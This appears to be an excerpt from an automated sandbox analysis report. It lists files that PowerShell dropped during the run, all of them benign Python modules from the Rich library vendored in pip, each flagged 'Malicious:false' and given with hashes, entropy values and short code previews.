                                                                                                                                                                                                                              SHA-512:9FF97476A1D87AE9F79172224791F4D2E6B62C222BD494EB281A544CAEADC7A3E86FD2506800E6D5596F2004F6FAE50698956252BC6E2E791609EA5708CBB824
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import Any, cast, Set, TYPE_CHECKING.from inspect import isclass..if TYPE_CHECKING:. from pip._vendor.rich.console import RenderableType.._GIBBERISH = """aihwerij235234ljsdnp34ksodfipwoe234234jlskjdf"""...def is_renderable(check_object: Any) -> bool:. """Check if an object may be rendered by Rich.""". return (. isinstance(check_object, str). or hasattr(check_object, "__rich__"). or hasattr(check_object, "__rich_console__"). )...def rich_cast(renderable: object) -> "RenderableType":. """Cast an object to a renderable by calling __rich__ if present... Args:. renderable (object): A potentially renderable object.. Returns:. object: The result of recursively calling __rich__.. """. from pip._vendor.rich.console import RenderableType.. rich_visited_set: Set[type] = set() # Prevent potential infinite loop. while hasattr(renderable, "__rich__") and not isclass(renderable):. # Detect object which claim to ha
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):166
                                                                                                                                                                                                                              Entropy (8bit):4.33185364800402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1REvgBrABxhT75EIABrwNFHWDyRTLT/oKDFRSdPlnt8/mod/ofld/3s5FMlv:1REYBcdXDN8DuLXZRAo6fu0
                                                                                                                                                                                                                              MD5:2B7A3FC13DCDE9DECA6D3A7217B45DE8
                                                                                                                                                                                                                              SHA1:F38FC0DB54D1FA3E66820604153208C316DC4DF3
                                                                                                                                                                                                                              SHA-256:ACD4FDC59AD56536085D90B43589F8D42250C1835B47E29E70F3B14E042F07C6
                                                                                                                                                                                                                              SHA-512:591865D005B3052F86CA7C7DAFFECDABB0A68E0F9B2665FA1BE7780651E9D89AF6F5A75801E47F561478E8AEADF814172CE317ABF5051932B580889115B1B66B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import NamedTuple...class Region(NamedTuple):. """Defines a rectangular region of the screen.""".. x: int. y: int. width: int. height: int.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4431
                                                                                                                                                                                                                              Entropy (8bit):4.392036353604663
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:2a3Spx4OoB4ZD8PRB4wp4jx4LVc4DYGD6iCpx4zoB4QD8sRB40fdvA:Ipx4HB4ZmRB4+4jx4hc436iCpx4sB4Qq
                                                                                                                                                                                                                              MD5:E06A7DD704115AB9EF91D993848D5265
                                                                                                                                                                                                                              SHA1:9F06287435666C8307DD18F62B41BDE7AB6EA5EA
                                                                                                                                                                                                                              SHA-256:F59F28B4E98CFADCB19F24E876F5E579CB4FEB49706A18C68834EB6EBC4F4938
                                                                                                                                                                                                                              SHA-512:1E06A9E4E7D8ADCA953DB5175F6C1E48A000FFDF8F10204723E84A12F6E7762732D88F6D1B24A0B5D5E1F0AD5CC7ED6C2BE60482330FA319C04A11ADC7C0B5F2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import inspect.from functools import partial.from typing import (. Any,. Callable,. Iterable,. List,. Optional,. Tuple,. Type,. TypeVar,. Union,. overload,.)..T = TypeVar("T")...Result = Iterable[Union[Any, Tuple[Any], Tuple[str, Any], Tuple[str, Any, Any]]].RichReprResult = Result...class ReprError(Exception):. """An error occurred when attempting to build a repr."""...@overload.def auto(cls: Optional[Type[T]]) -> Type[T]:. ......@overload.def auto(*, angular: bool = False) -> Callable[[Type[T]], Type[T]]:. ......def auto(. cls: Optional[Type[T]] = None, *, angular: Optional[bool] = None.) -> Union[Type[T], Callable[[Type[T]], Type[T]]]:. """Class decorator to create __repr__ from __rich_repr__""".. def do_replace(cls: Type[T], angular: Optional[bool] = None) -> Type[T]:. def auto_repr(self: T) -> str:. """Create repr string from __rich_repr__""". repr_str: List[str] = []. append = repr_str.append.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4602
                                                                                                                                                                                                                              Entropy (8bit):4.4005420708000065
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:L1WbbQoj5Y92PUYJzcDgUj3FUf7pnhyAoEf/CkfutfOJw+kSd3nt:LIbUoNYCUwKJJoBTf/7futfOJDkSd3nt
                                                                                                                                                                                                                              MD5:790460DE91D5A5783F3967BEE938FE9C
                                                                                                                                                                                                                              SHA1:7749AEF099CB40F7099A009EDF075EE3936D4757
                                                                                                                                                                                                                              SHA-256:D1F35A4BF68445ADD43117374F958CA4DFECBA6B43C5F6A8AF6CB7A1FD5FB419
                                                                                                                                                                                                                              SHA-512:05782E9D49C1F2C9A247F1416F1EB65B0FDA116DDF12D871C65DBEE282E9746C113A2F42BB83996BE29CA38B102FC20238082FDA7E0C5F65F7226844759C96C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import Union..from .align import AlignMethod.from .cells import cell_len, set_cell_size.from .console import Console, ConsoleOptions, RenderResult.from .jupyter import JupyterMixin.from .measure import Measurement.from .style import Style.from .text import Text...class Rule(JupyterMixin):. """A console renderable to draw a horizontal rule (line)... Args:. title (Union[str, Text], optional): Text to render in the rule. Defaults to "".. characters (str, optional): Character(s) used to draw the line. Defaults to ".".. style (StyleType, optional): Style of Rule. Defaults to "rule.line".. end (str, optional): Character at end of Rule. defaults to "\\\\n". align (str, optional): How to align the title, one of "left", "center", or "right". Defaults to "center".. """.. def __init__(. self,. title: Union[str, Text] = "",. *,. characters: str = ".",. style: Union[str, Style] = "rule.line",. e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2843
                                                                                                                                                                                                                              Entropy (8bit):4.631212873775702
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:QX+L4K8oUk7JnJTHrB0jiNxs2bNhggq3Ktwk8XiKqE6PBrtv6fJOBlfT:xQkjTLi2/hikGXqE6PBrtAJOBtT
                                                                                                                                                                                                                              MD5:E079470D462D4CF31E883874C56FFD10
                                                                                                                                                                                                                              SHA1:5AEC0581ED1C64D49146D94301C0E01D2ECC5000
                                                                                                                                                                                                                              SHA-256:4CC514F2AA35EED872A9008FAA30CB62983F514D64E6A55DF96C2226F9C955AB
                                                                                                                                                                                                                              SHA-512:90B59FE3F882BAF6FFA1753698C629F40493A2215DDF3431BEDE92082932451AC38B429BB0855E8A7F276944DF33EAABDDDB72C39CADA5BA5A5E5E96DA1BB40A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from collections.abc import Mapping.from typing import TYPE_CHECKING, Any, Optional, Tuple..from .highlighter import ReprHighlighter.from .panel import Panel.from .pretty import Pretty.from .table import Table.from .text import Text, TextType..if TYPE_CHECKING:. from .console import ConsoleRenderable...def render_scope(. scope: "Mapping[str, Any]",. *,. title: Optional[TextType] = None,. sort_keys: bool = True,. indent_guides: bool = False,. max_length: Optional[int] = None,. max_string: Optional[int] = None,.) -> "ConsoleRenderable":. """Render python variables in a given scope... Args:. scope (Mapping): A mapping containing variable names and values.. title (str, optional): Optional title. Defaults to None.. sort_keys (bool, optional): Enable sorting of items. Defaults to True.. indent_guides (bool, optional): Enable indentation guides. Defaults to False.. max_length (int, optional): Maximum length of containers before
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1591
                                                                                                                                                                                                                              Entropy (8bit):4.432222648559961
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:KxZdUujxkkZSHlstWfVNh+rbIsBuS2N/iK:KVrjxkkZSHlmA/+/Isb2N/
                                                                                                                                                                                                                              MD5:0C196D1D4B558FD036F7FFE1B58D065C
                                                                                                                                                                                                                              SHA1:4F0802D8391D8C1E0397768DB38BB9E56CBAC613
                                                                                                                                                                                                                              SHA-256:628791784494871EF882BA9BD264926FD960861CAC5A6147621B1B3154235CEF
                                                                                                                                                                                                                              SHA-512:28DC7A790717612D6F570BF0AEB21E79D313D98ADF848AAB6720B42F7438453B38496836ABCEEE501F6DF7BF285B345E760995D38ABF0F9749368D953FDA11EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import Optional, TYPE_CHECKING..from .segment import Segment.from .style import StyleType.from ._loop import loop_last...if TYPE_CHECKING:. from .console import (. Console,. ConsoleOptions,. RenderResult,. RenderableType,. Group,. )...class Screen:. """A renderable that fills the terminal screen and crops excess... Args:. renderable (RenderableType): Child renderable.. style (StyleType, optional): Optional background style. Defaults to None.. """.. renderable: "RenderableType".. def __init__(. self,. *renderables: "RenderableType",. style: Optional[StyleType] = None,. application_mode: bool = False,. ) -> None:. from pip._vendor.rich.console import Group.. self.renderable = Group(*renderables). self.style = style. self.application_mode = application_mode.. def __rich_console__(. self, console: "Console", options: "ConsoleOptions". ) -
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24247
                                                                                                                                                                                                                              Entropy (8bit):4.224879145439436
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:axAs/h+ppNppbegjkVEQRppxRp8RpQw+9zQqLAigHZKdUOe8:QAs/h+ppNpjjgEkppPpQpQw+9zQqEigU
                                                                                                                                                                                                                              MD5:7DAF763BE42232121E4EA404C5DB7BF0
                                                                                                                                                                                                                              SHA1:B925169C41F073F6833CF90881671838B6D4A653
                                                                                                                                                                                                                              SHA-256:5CB9C9105BDC5776E3695CCC3542627A6DE7F25BEF23D4C9E4F4EEF881B6B938
                                                                                                                                                                                                                              SHA-512:955173127B247B2F7F5E4F06BD5086DAA8FEF52E8FF90BC9AA582E146AB3369865E32D6670035628351E454F7476AE86E553C9A1F44ACE187DC9892937C2785D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from enum import IntEnum.from functools import lru_cache.from itertools import filterfalse.from logging import getLogger.from operator import attrgetter.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Sequence,. Tuple,. Type,. Union,.)..from .cells import (. _is_single_cell_widths,. cached_cell_len,. cell_len,. get_character_cell_size,. set_cell_size,.).from .repr import Result, rich_repr.from .style import Style..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderResult..log = getLogger("rich")...class ControlType(IntEnum):. """Non-printable control codes which typically translate to ANSI codes.""".. BELL = 1. CARRIAGE_RETURN = 2. HOME = 3. CLEAR = 4. SHOW_CURSOR = 5. HIDE_CURSOR = 6. ENABLE_ALT_SCREEN = 7. DISABLE_ALT_SCREEN = 8. CURSOR_UP = 9. CURSOR_DOWN = 10. CURSOR_FORWARD = 11. CURSOR_BACKWARD = 12. CURSOR_MOVE_TO_COLUMN = 13. CU
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4339
                                                                                                                                                                                                                              Entropy (8bit):4.377177411228464
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WG1E1zWj232jtVPVUmg9/prjfUBxlyWs6:WG1o6tNWXoH8WZ
                                                                                                                                                                                                                              MD5:1709ACB3B169AECC3CEAF394B0CB5BAD
                                                                                                                                                                                                                              SHA1:5A96E06E5CAE604BF13A3E259CE1538EFF9E4644
                                                                                                                                                                                                                              SHA-256:D799280A61740D0783F3E936F0BA6DE97FF3250525CC4860A3FE80EAECB8EE57
                                                                                                                                                                                                                              SHA-512:0933C7D88BA7406DA8E116C11540CE95BC2634B70936C4B21FA75CD74043605D41A4F50F9EFBF887A0E14BDCB051C4DDD5B7A9F367974D900573195D9707F013
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import cast, List, Optional, TYPE_CHECKING, Union..from ._spinners import SPINNERS.from .measure import Measurement.from .table import Table.from .text import Text..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderResult, RenderableType. from .style import StyleType...class Spinner:. """A spinner animation... Args:. name (str): Name of spinner (run python -m rich.spinner).. text (RenderableType, optional): A renderable to display at the right of the spinner (str or Text typically). Defaults to "".. style (StyleType, optional): Style for spinner animation. Defaults to None.. speed (float, optional): Speed factor for animation. Defaults to 1.0... Raises:. KeyError: If name isn't one of the supported spinner animations.. """.. def __init__(. self,. name: str,. text: "RenderableType" = "",. *,. style: Optional["StyleType"] = None,. speed: float = 1.0,. ) ->
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4425
                                                                                                                                                                                                                              Entropy (8bit):4.403304241123254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:tcr/I55j7FHIRuKyVyAlPVYNmW2Lowu5wYW:tcO5llVyDmW2Lowu5wYW
                                                                                                                                                                                                                              MD5:3D1772B4ED0F97930A5ABD7E676948F2
                                                                                                                                                                                                                              SHA1:A8BEDFFABAF6C3502EF2940233EB50F8454205C6
                                                                                                                                                                                                                              SHA-256:809B085C865E4A8DEEACECB14548ECE95AE15F9099AC0D0DC4843E7718429F0A
                                                                                                                                                                                                                              SHA-512:825177985038CE0CBB8AD2AE0C10DC342AFD3BB9B1D0F4814B008F01A0B4E7E2C70970F90944C7FAF4EF09CF27BC3B7EA81B6253D570B3AE4B76B7480818EA46
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from types import TracebackType.from typing import Optional, Type..from .console import Console, RenderableType.from .jupyter import JupyterMixin.from .live import Live.from .spinner import Spinner.from .style import StyleType...class Status(JupyterMixin):. """Displays a status indicator with a 'spinner' animation... Args:. status (RenderableType): A status renderable (str or Text typically).. console (Console, optional): Console instance to use, or None for global console. Defaults to None.. spinner (str, optional): Name of spinner animation (see python -m rich.spinner). Defaults to "dots".. spinner_style (StyleType, optional): Style of spinner. Defaults to "status.spinner".. speed (float, optional): Speed factor for spinner animation. Defaults to 1.0.. refresh_per_second (float, optional): Number of refreshes per second. Defaults to 12.5.. """.. def __init__(. self,. status: RenderableType,. *,. console
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):27073
                                                                                                                                                                                                                              Entropy (8bit):4.335324469716836
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:kfphCygDI8ZPG8n5kYPehr/8JAp9rMbIBzeE8o0o/z88aXs7n:kjCygTPFqgcrJBze6t/NaXs7n
                                                                                                                                                                                                                              MD5:7C60A5C7C22BCD1BAF6171217CD71618
                                                                                                                                                                                                                              SHA1:157AF0D0548F2F4C1FDE0BBA511C13DE2AEB7D61
                                                                                                                                                                                                                              SHA-256:DE18A8707FF837CBF0466DFEF32156CCCEED4B08E312F7A7EBD5EA59AB124303
                                                                                                                                                                                                                              SHA-512:7B7BEFF1FE10BFE4679EB274A2AFF2100D8EBFE8CA613A8500C16E519396068DEF1858D58899E31A70ED468948E95DE07246124F6ABF60D86FCCC772F34B4A5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import sys.from functools import lru_cache.from marshal import dumps, loads.from random import randint.from typing import Any, Dict, Iterable, List, Optional, Type, Union, cast..from . import errors.from .color import Color, ColorParseError, ColorSystem, blend_rgb.from .repr import Result, rich_repr.from .terminal_theme import DEFAULT_TERMINAL_THEME, TerminalTheme..# Style instances and style definitions are often interchangeable.StyleType = Union[str, "Style"]...class _Bit:. """A descriptor to get/set a style attribute bit.""".. __slots__ = ["bit"].. def __init__(self, bit_no: int) -> None:. self.bit = 1 << bit_no.. def __get__(self, obj: "Style", objtype: Type["Style"]) -> Optional[bool]:. if obj._set_attributes & self.bit:. return obj._attributes & self.bit != 0. return None...@rich_repr.class Style:. """A terminal style... A terminal style consists of a color (`color`), a background color (`bgcolor`), and a number of attributes, suc
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1258
                                                                                                                                                                                                                              Entropy (8bit):4.561007222082858
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REOWq31WH2St1AMGjTFMArHG2UCVNjhjPNLT6FCVNlpzpBlpLjpuGv:Uq31WH2St4jTFMIHG2fVNlxTLVNlPBf1
                                                                                                                                                                                                                              MD5:9525EC563099344E538095DFDB156A62
                                                                                                                                                                                                                              SHA1:6FD170BA37F8246B0F64BA21357410459044160C
                                                                                                                                                                                                                              SHA-256:799367CC6AC8E248BFE78A606373A3D13FB1DE5C5D5D3621E3FAF20C1DB8C015
                                                                                                                                                                                                                              SHA-512:D5DC8BB7B27D2C39F06AA07659AE3A04E661CF4E4A8DDFEF015506427B5DF456FD9D46B2848E6594762B85332A46362B48EBACB39AB39F9795B4C22CC1831D07
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import TYPE_CHECKING..from .measure import Measurement.from .segment import Segment.from .style import StyleType..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderResult, RenderableType...class Styled:. """Apply a style to a renderable... Args:. renderable (RenderableType): Any renderable.. style (StyleType): A style to apply across the entire renderable.. """.. def __init__(self, renderable: "RenderableType", style: "StyleType") -> None:. self.renderable = renderable. self.style = style.. def __rich_console__(. self, console: "Console", options: "ConsoleOptions". ) -> "RenderResult":. style = console.get_style(self.style). rendered_segments = console.render(self.renderable, options). segments = Segment.apply_style(rendered_segments, style). return segments.. def __rich_measure__(. self, console: "Console", options: "ConsoleOptions". ) -> Measurement:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35173
                                                                                                                                                                                                                              Entropy (8bit):4.400411856961675
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ADJZ9gsESv8aI5bxdCX0xXF5zzXoQpARl:ARqA0xX/zjfpW
                                                                                                                                                                                                                              MD5:1076C6AAE1F74EF469DF8D8B08E51F77
                                                                                                                                                                                                                              SHA1:04A48C39DB598DB3D0B5DDD11E911193FBB866C6
                                                                                                                                                                                                                              SHA-256:8E00E25422BA72947436604EA59988BBE51DE1E696EDF1EF8C96640DB8E97120
                                                                                                                                                                                                                              SHA-512:C60E6A3B30FB67DE92AE40D179AFE5698905FE265E07583F23BAAE3C2D005EAC3522B011B8028D49EAF5E65F449656AF7CB9A0F9063D4A8ADB9C8C8EDFF0DA16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import os.path.import platform.import re.import sys.import textwrap.from abc import ABC, abstractmethod.from pathlib import Path.from typing import (. Any,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Sequence,. Set,. Tuple,. Type,. Union,.)..from pip._vendor.pygments.lexer import Lexer.from pip._vendor.pygments.lexers import get_lexer_by_name, guess_lexer_for_filename.from pip._vendor.pygments.style import Style as PygmentsStyle.from pip._vendor.pygments.styles import get_style_by_name.from pip._vendor.pygments.token import (. Comment,. Error,. Generic,. Keyword,. Name,. Number,. Operator,. String,. Token,. Whitespace,.).from pip._vendor.pygments.util import ClassNotFound..from pip._vendor.rich.containers import Lines.from pip._vendor.rich.padding import Padding, PaddingDimensions..from ._loop import loop_first.from .cells import cell_len.from .color import Color, blend_rgb.from .console import Console, ConsoleOptions
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39684
                                                                                                                                                                                                                              Entropy (8bit):4.335845620392849
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ooMviGrHA4IGCajB8/LteBH+j67RasODd:ooEikVDBocejX
                                                                                                                                                                                                                              MD5:7AAF0F314ED2D88485CB36C3DD66904D
                                                                                                                                                                                                                              SHA1:C2391AEB22FAFCCCC9F3E756AEE4847581E87DA9
                                                                                                                                                                                                                              SHA-256:F96CDEB0BF9524AB1A883537BB2733A49307CBA5426927B0058270C7C46E748F
                                                                                                                                                                                                                              SHA-512:2AF41864DB4ED0D05B5FB06ACEAF2370D6A8E7CEC3A9BECFC416962DC045113A9F22561037D43AA32D62409F10F09A6CA03D23E071D7A7129403BA3D51520597
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from dataclasses import dataclass, field, replace.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Sequence,. Tuple,. Union,.)..from . import box, errors.from ._loop import loop_first_last, loop_last.from ._pick import pick_bool.from ._ratio import ratio_distribute, ratio_reduce.from .align import VerticalAlignMethod.from .jupyter import JupyterMixin.from .measure import Measurement.from .padding import Padding, PaddingDimensions.from .protocol import is_renderable.from .segment import Segment.from .style import Style, StyleType.from .text import Text, TextType..if TYPE_CHECKING:. from .console import (. Console,. ConsoleOptions,. JustifyMethod,. OverflowMethod,. RenderableType,. RenderResult,. )...@dataclass.class Column:. """Defines a column within a ~Table... Args:. title (Union[str, Text], optional): The title of the table rendered at the top. Defaults to No
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3370
                                                                                                                                                                                                                              Entropy (8bit):4.21397722226693
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QKDQOUVxbxUMbS64xM3Swkwf5Iz+FvWHvix:EnbS64+TkwxIz+FvCvix
                                                                                                                                                                                                                              MD5:26697A919BF9B0EED369A89647145303
                                                                                                                                                                                                                              SHA1:006B559781A41F7F79C70AC0BDEDAD9F603C4D13
                                                                                                                                                                                                                              SHA-256:D63E7EB9F25F9EF940A3942C8BF0026625C39B0317CEA826141C8E6D3F7EC896
                                                                                                                                                                                                                              SHA-512:827C24A259B44978564070EBDDE1C9BB770506B3BF7B7DCA692732F831F7A3EAE5117AA286A357711F0B5FF096BBA96E1F249E6D4F7FC0E20ADD35654472B034
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import List, Optional, Tuple..from .color_triplet import ColorTriplet.from .palette import Palette.._ColorTuple = Tuple[int, int, int]...class TerminalTheme:. """A color theme used when exporting console content... Args:. background (Tuple[int, int, int]): The background color.. foreground (Tuple[int, int, int]): The foreground (text) color.. normal (List[Tuple[int, int, int]]): A list of 8 normal intensity colors.. bright (List[Tuple[int, int, int]], optional): A list of 8 bright colors, or None. to repeat normal intensity. Defaults to None.. """.. def __init__(. self,. background: _ColorTuple,. foreground: _ColorTuple,. normal: List[_ColorTuple],. bright: Optional[List[_ColorTuple]] = None,. ) -> None:. self.background_color = ColorTriplet(*background). self.foreground_color = ColorTriplet(*foreground). self.ansi_colors = Palette(normal + (bright or normal))...DEF
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with very long lines (463)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45525
                                                                                                                                                                                                                              Entropy (8bit):4.283431964929081
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zkXL3u1OiAVBZBuBHLSWGDKkd6Tl6CxOJ7PTptkd1oMc4zQMfHwQYfk6:Q7gMDKk8TeQdywPpYfl
                                                                                                                                                                                                                              MD5:FB2F51FD5745862E7A506A96F54E935D
                                                                                                                                                                                                                              SHA1:980627BCAD32C97A769E4B100AE2510782C81E2F
                                                                                                                                                                                                                              SHA-256:FFC2419526AED1CDB3F0434E64C8B5849ECCD59198E34F04E3E8578C7CB28350
                                                                                                                                                                                                                              SHA-512:DF17FDF02F72C824D72A1A4771AF664AC004EFECEDA04C47620AEA0D60AD80CDD62CFB7B0F95D194A5396674E48B5C10267E17DF2DF50E4AFB95365C27732210
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import re.from functools import partial, reduce.from math import gcd.from operator import itemgetter.from typing import (. TYPE_CHECKING,. Any,. Callable,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Tuple,. Union,.)..from ._loop import loop_last.from ._pick import pick_bool.from ._wrap import divide_line.from .align import AlignMethod.from .cells import cell_len, set_cell_size.from .containers import Lines.from .control import strip_control_codes.from .emoji import EmojiVariant.from .jupyter import JupyterMixin.from .measure import Measurement.from .segment import Segment.from .style import Style, StyleType..if TYPE_CHECKING: # pragma: no cover. from .console import Console, ConsoleOptions, JustifyMethod, OverflowMethod..DEFAULT_JUSTIFY: "JustifyMethod" = "default".DEFAULT_OVERFLOW: "OverflowMethod" = "fold"..._re_whitespace = re.compile(r"\s+$")..TextType = Union[str, "Text"]..GetStyleCallable = Callable[[str], Optional[StyleType]]...class Span(
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3777
                                                                                                                                                                                                                              Entropy (8bit):4.441245996103511
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:7eT7UYRvzYXENGE6q/83X/xGXrkXGulzRKHd5F1x3Gul/NGGNgosGmMAGulRlvHP:yTHzJgA83PMSl23FHlfNTmMalbs4lWnW
                                                                                                                                                                                                                              MD5:2C48CEF31F4B18114973F1458E2DF5D7
                                                                                                                                                                                                                              SHA1:32897F1406E9E0E9D8D31054CC44B8712A3C606D
                                                                                                                                                                                                                              SHA-256:6DE9452688330345B41F2B1069B29A1CE7374561F6928DDF400261A0DF8015DA
                                                                                                                                                                                                                              SHA-512:85C6ED32BAD99F6062958E01159294A53AB29F4291F2A656E03DA6284FB48ADA543B1C82E7A08CB3F468CAD0310AFE7A84A46CBAAD73B813531334F8CFCE88DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import configparser.from typing import Dict, List, IO, Mapping, Optional..from .default_styles import DEFAULT_STYLES.from .style import Style, StyleType...class Theme:. """A container for style information, used by :class:`~rich.console.Console`... Args:. styles (Dict[str, Style], optional): A mapping of style names on to styles. Defaults to None for a theme with no styles.. inherit (bool, optional): Inherit default styles. Defaults to True.. """.. styles: Dict[str, Style].. def __init__(. self, styles: Optional[Mapping[str, StyleType]] = None, inherit: bool = True. ):. self.styles = DEFAULT_STYLES.copy() if inherit else {}. if styles is not None:. self.styles.update(. {. name: style if isinstance(style, Style) else Style.parse(style). for name, style in styles.items(). }. ).. @property. def config(self) -> str:. """Get contents of
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):102
                                                                                                                                                                                                                              Entropy (8bit):4.68197687803328
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1LBzQf9jCMoQEldx4zv+GR+Q58v5gdpxaddx4zu:1LBzQl+MxG0BRT5+58pY7/
                                                                                                                                                                                                                              MD5:579B6AB8DACC395E63FFF4800B1C6D3C
                                                                                                                                                                                                                              SHA1:5962944738F3A08C35E5119F576C85EDFF8C58C0
                                                                                                                                                                                                                              SHA-256:D318132E8CDF69B79B62D709B43742E50917E4855411ABE2A83509261E185459
                                                                                                                                                                                                                              SHA-512:464487FBAF8C4C79DDE3280B5F4C5C80D7A7DB389FEB8EB9870241BE1B6C4971D03009349539571D3ACD93CB15572A2618AD388022E7809A70F3CC8C4E4A3C50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .default_styles import DEFAULT_STYLES.from .theme import Theme...DEFAULT = Theme(DEFAULT_STYLES).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
